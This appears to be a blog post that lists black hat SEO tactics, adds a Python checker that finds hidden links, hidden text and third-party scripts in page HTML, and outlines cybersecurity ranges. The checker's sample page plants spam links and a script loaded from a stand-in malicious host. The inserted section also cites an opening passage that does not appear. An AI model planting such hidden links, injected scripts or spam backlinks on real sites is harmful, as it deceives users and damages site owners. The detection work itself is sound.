Black hat search engine optimization (SEO) refers to the use of techniques and strategies that violate search engine guidelines. The goal of these tactics is to trick search engines into giving higher rankings, even if those rankings are not based on the true value or relevance of the website content. While black hat SEO methods may sometimes produce a short-lived ranking boost, in the long term they are more likely to get the site penalized by search engines, and sometimes removed from search results entirely.

Here are some common black hat SEO tactics:

  1. Keyword Stuffing: The overuse or repetition of keywords on a web page in an attempt to improve the page's ranking in search results.

  2. Hidden text and links: Hides text or links on a web page using the same color as the background, making it invisible to users but visible to search engines.

  3. Illegal doorway pages (Doorway Pages): Creating specific pages for search engines. These pages have no actual value to users, and when users visit, they are redirected to another page.

  4. Link Farms: Creating a large number of interconnected websites or pages simply to increase the number of external links to the website.

  5. Content Scraping: Copying content from another website and then posting it on your own site.

  6. Sneaky Redirects: Allow users and search engines to see different content. For example, when a search engine crawls a page, it displays keyword-optimized content, but when a user visits, it will be redirected to an irrelevant page.

  7. Negative SEO: Attempts to harm a competitor’s search rankings. This may include creating low-quality, spammy backlinks to competitor websites.

  8. Overuse of anchor text: Excessive use of the same, optimized anchor text in external links.
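Tactic 2 in this list (hidden text and links) and the black links described at the start of this post (zero font size, text matching the background colour, off-screen offsets, plus <a> or <script> tags pulling in a third-party script) are all visible in the page source, so a site owner can scan for them. The following is an added example, not code from the original post: an HTML walker that reports links and text hidden by inline styles, inheriting the hiding from parent elements, and script tags loaded from a host other than the page's own. The HTML, the page host and the white background assumption are constructed; the style rules are heuristics for inline styles only and do not evaluate external stylesheets.

```python
"""Find hidden links, hidden text and third-party scripts in page HTML.

Added example, not from the original post. The HTML is constructed and the
page host is assumed; the style rules cover the hiding tricks named in the
post (zero font size, text colour matching the background, off-screen
offset) plus display:none, visibility:hidden, zero opacity and the hidden attribute.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_RULES = [
    (re.compile(r"font-size\s*:\s*0(px|pt|em|%)?(\s|;|$)"), "zero font size"),
    (re.compile(r"display\s*:\s*none"), "display:none"),
    (re.compile(r"visibility\s*:\s*hidden"), "visibility:hidden"),
    (re.compile(r"opacity\s*:\s*0(\.0+)?(\s|;|$)"), "zero opacity"),
    (re.compile(r"(left|top|text-indent)\s*:\s*-\d{4,}px"), "off-screen offset"),
]
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr", "area", "base", "col", "source"}


def _norm_colour(c):
    """Expand #abc to #aabbcc so short and long hex forms compare equal."""
    c = c.lower()
    if re.fullmatch(r"#[0-9a-f]{3}", c):
        c = "#" + "".join(ch * 2 for ch in c[1:])
    return c


def text_matches_background(style, background):
    m = re.search(r"(?<![-\w])color\s*:\s*([#\w]+)", style)  # 'color', not 'background-color'
    return bool(m) and _norm_colour(m.group(1)) == _norm_colour(background)


class HiddenContentFinder(HTMLParser):
    """Collects (kind, value, reasons) findings while walking the document."""

    def __init__(self, page_host, background="#ffffff"):
        super().__init__()
        self.page_host = page_host
        self.background = background
        self.findings = []
        self._stack = []  # open elements as (tag, hiding_reasons)

    def _reasons_for(self, attrs):
        style = (attrs.get("style") or "").lower()
        reasons = [why for rx, why in HIDING_RULES if rx.search(style)]
        if text_matches_background(style, self.background):
            reasons.append("text colour matches background")
        if "hidden" in attrs:
            reasons.append("hidden attribute")
        return reasons

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        own = self._reasons_for(a)
        inherited = [r for _, rs in self._stack for r in rs]  # hiding applied by an ancestor
        if tag == "script" and a.get("src"):
            host = urlparse(a["src"]).hostname
            if host and host != self.page_host:
                self.findings.append(("external script", a["src"], ["third-party host"]))
        if tag == "a" and a.get("href") and (own or inherited):
            self.findings.append(("hidden link", a["href"], own + inherited))
        if tag not in VOID_TAGS:
            self._stack.append((tag, own))

    def handle_endtag(self, tag):
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break

    def handle_data(self, data):
        text = data.strip()
        reasons = [r for _, rs in self._stack for r in rs]
        inside_link = any(t == "a" for t, _ in self._stack)
        if text and reasons and not inside_link:  # link text is already reported with its link
            self.findings.append(("hidden text", text[:40], reasons))


def find_hidden(page_url, html, background="#ffffff"):
    finder = HiddenContentFinder(urlparse(page_url).hostname, background)
    finder.feed(html)
    return finder.findings


# Constructed page on www.example.com: one visible link, two hidden links,
# hidden keyword text, one first-party script and one third-party script
SAMPLE_HTML = """<html><body style="background:#fff">
<p>Normal content with a <a href="/about">visible link</a>.</p>
<div style="font-size:0px"><a href="http://spam.invalid/x">cheap pills</a></div>
<a href="http://casino.invalid/" style="position:absolute;left:-9999px">casino</a>
<span style="color:#fff">buy buy buy keyword keyword</span>
<script src="https://www.example.com/static/app.js"></script>
<script src="http://evil.invalid/s.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, value, reasons in find_hidden("https://www.example.com/", SAMPLE_HTML):
        print(f"[{kind}] {value}  ({', '.join(reasons)})")
```

Hiding is often applied through a class in an external stylesheet rather than an inline style; a thorough check renders the page in a headless browser and asks for each link's computed style and bounding box instead of pattern-matching the source.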


Cybersecurity range (non-attack means part)

A cybersecurity range (also known as an offensive and defensive lab or penetration testing lab) is a controlled environment that simulates a real-world network for security professionals, researchers, and learners. It provides a safe and legal platform that allows users to learn and understand various network security concepts, technologies and attack techniques, and to practice and test their network penetration skills and defense strategies, without affecting the actual production environment.

The composition and function of the range

  1. Experimental environment:

    • Generally includes various operating systems and application software.
    • Contains known security vulnerabilities for testing and experimentation purposes.
  2. Simulated attack:

    • Users can simulate real-world attack scenarios.
    • Can practice penetration testing, vulnerability exploitation, password cracking and other techniques.
  3. Defense Strategy:

    • Provide an experimental environment for testing and validating defense strategies and tools.
    • Help users understand how to detect, prevent, and respond to attacks.
  4. Academic research:

    • Help beginners and experts understand and learn the latest attack techniques and defense strategies.
    • Promote cybersecurity research and development.
  5. Comprehensive examination:

    • Allows organizations to test their systems and networks to ensure compliance with security standards and regulations.

The relationship between the range and the actual network environment

The range provides an environment that closely resembles an actual network environment, but is operated in a controlled and isolated setting to prevent any accidental damage to real systems and data. By conducting experiments and testing on the range, users can better understand and assess their network security posture and identify potential security issues and vulnerabilities, so as to protect against them better in real-world environments.

How to set up or use a range?

  1. Use a public range platform:
    • Online platforms such as Hack The Box or CTF platforms provide cybersecurity range services.
  2. Private building:
    • Users can also build their own range using open-source or commercial software.
    • Virtualization technologies such as VMware or VirtualBox allow users to create multiple virtual machines on a single piece of physical hardware, which can be used as a range environment. If the author studies further, he will use virtualization technology to build an offensive and defensive environment.

Summary

The cybersecurity range is an important part of the cybersecurity field. It allows users to practice, test, and learn cybersecurity technologies. Whether it is attack techniques or defense strategies, they can be studied and practiced in depth on the range, thereby improving users' network security capabilities in real environments.

Origin blog.csdn.net/qq_65052774/article/details/133278664